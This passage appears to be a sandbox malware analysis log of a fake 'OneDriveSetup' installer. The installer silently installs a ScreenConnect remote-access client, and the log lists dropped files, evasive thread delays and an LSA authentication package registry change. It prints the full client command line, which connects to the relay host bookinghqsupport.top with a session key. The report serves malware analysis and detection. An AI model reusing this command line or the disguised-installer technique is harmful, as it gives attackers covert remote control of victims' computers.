                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mmc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 18D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 3370000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 3200000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 61A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 79F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 89F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 69F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 8C70000 memory reserve | memory write watch
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: 9C70000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeMemory allocated: 1FA0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeMemory allocated: 21E0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeMemory allocated: 2010000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMemory allocated: 14F0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMemory allocated: 1B0C0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMemory allocated: 9D0000 memory reserve | memory write watch
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMemory allocated: 1A780000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exeMemory allocated: 4C70000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exeMemory allocated: 4600000 memory commit | memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exeMemory allocated: 4EE0000 memory commit | memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exeMemory allocated: 4F20000 memory reserve | memory write watch
                      Source: C:\Windows\System32\mmc.exeMemory allocated: 5030000 memory reserve | memory write watch
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\mmc.exeWindow / User API: threadDelayed 700
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI512D.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI436F.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Windows\System32\svchost.exe TID: 1008Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exe TID: 752Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe TID: 2932Thread sleep count: 49 > 30
                      Source: C:\Windows\System32\mmc.exe TID: 3492Thread sleep count: 700 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeProcess token adjusted: Debug
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (d241e538b9eb3f0a)\screenconnect.clientservice.exe" "?e=access&y=guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=bgiaaackaabsu0exaagaaaeaaqct6sszjydr%2fljmo5hpn8us4uyae1kfx0emr5mgd6wzfjdx5v16iauld7anubgtx0f3lf1idcdy6kpnajjaqdv62l1xetkhzqejflahnrynki4igddx3udlj%2bq5ccf18ayniy9sxt2xekatdpx%2bheawzxumc46podu5uafzskoj3zhdqfkucobiyw%2f65wl6minahyngepubztnu97itnow%2bn22p2gzqzziqkfuuwabhjclpnbqhlnuukec1vr2lxx3ezdrdkmlntp6lmt39dgw8ssiitizom5omfnv7u8h8la819gdb3bqba%2fsr%2fj57hzmjtk78yzxu2%2fz9ypp9dzdb&c=onedrivesetup%20fb&c=&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsb.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsymsl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Users\user\AppData\Local\Comms\UnistoreDB\tmp.edb VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Client.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Core.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.Windows.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.dll VolumeInformation
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
